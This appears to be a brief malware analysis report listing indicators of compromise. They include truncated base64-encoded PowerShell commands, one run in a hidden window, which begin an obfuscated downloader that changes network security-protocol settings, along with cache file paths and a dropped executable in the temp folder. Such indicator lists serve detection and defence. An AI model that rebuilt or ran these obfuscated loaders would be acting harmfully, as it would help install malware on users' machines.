Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\qrpo.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHQAeQBlAGEAegA5AD0AJwBZAHgAZQBwAGUAZQBwACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMARQBDAFUAcgBJAHQAYABZAGAAUABSAG8AdABvAGMAYABvAGwAIgAgAD0AIAAnAH...' (with hidden window)